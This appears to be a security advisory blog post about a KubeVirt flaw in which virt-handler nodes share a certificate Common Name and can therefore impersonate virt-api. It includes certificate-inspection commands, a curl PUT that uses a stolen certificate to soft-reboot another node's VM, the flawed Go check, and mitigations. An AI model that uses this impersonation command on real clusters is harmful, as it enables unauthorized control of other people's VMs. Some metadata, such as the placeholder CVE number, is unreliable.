KubeVirt, Improper Authentication, CVE-2024-XXXX (Critical)

By /

Listen to this Post

The vulnerability stems from improper TLS certificate management where both the `virt-api` component and other `virt-handler` instances use client certificates with the identical Common Name (CN) kubevirt.io:system:client:virt-handler. This CN is the sole field checked by the `verifyPeerCert` function in `pkg/util/tls/tls.go` for authenticating clients connecting to a virt-handler‘s API server. Consequently, a compromised `virt-handler` can use its own client certificate bundle to successfully authenticate to any other `virt-handler` instance on the network, impersonating the `virt-api` service. This allows the attacker to issue privileged VM lifecycle commands (like soft rebooting a VM via a PUT request to the `/softreboot` subresource endpoint) on VMs managed by other, uncompromised `virt-handler` nodes, bypassing intended access controls.
Platform: KubeVirt
Version: Pre-1.0.2
Vulnerability: Improper Authentication
Severity: Critical
date: 2024-11-07

Prediction: 2024-11-28

What Undercode Say:

openssl x509 -text -in /etc/virt-handler/clientcertificates/tls.crt | grep "Subject:"
CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1)
docker inspect $CID | grep "clientcertificates:ro"
curl -ki --cert /path/tls.crt --key /path/tls.key https://<target_ip>:8186/v1/namespaces/default/virtualmachineinstances/<vmi-name>/softreboot -XPUT

//pkg/util/tls/tls.go
func verifyPeerCert(...) error {
fullCommonName := fmt.Sprintf("kubevirt.io:system:%s:virt-handler", commonName)
if !externallyManaged && c.Subject.CommonName != fullCommonName {
return fmt.Errorf("common name is invalid, expected %s, but got %s", fullCommonName, c.Subject.CommonName)
}

How Exploit:

Compromise virt-handler node.

Steal client TLS certificates.

Impersonate virt-api service.

Issue VM control commands.

Protection from this CVE

Update KubeVirt.

Use distinct certificate CNs.

Implement stricter mTLS verification.

Impact:

VM lifecycle compromise.

Cluster integrity breach.

Privilege escalation.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top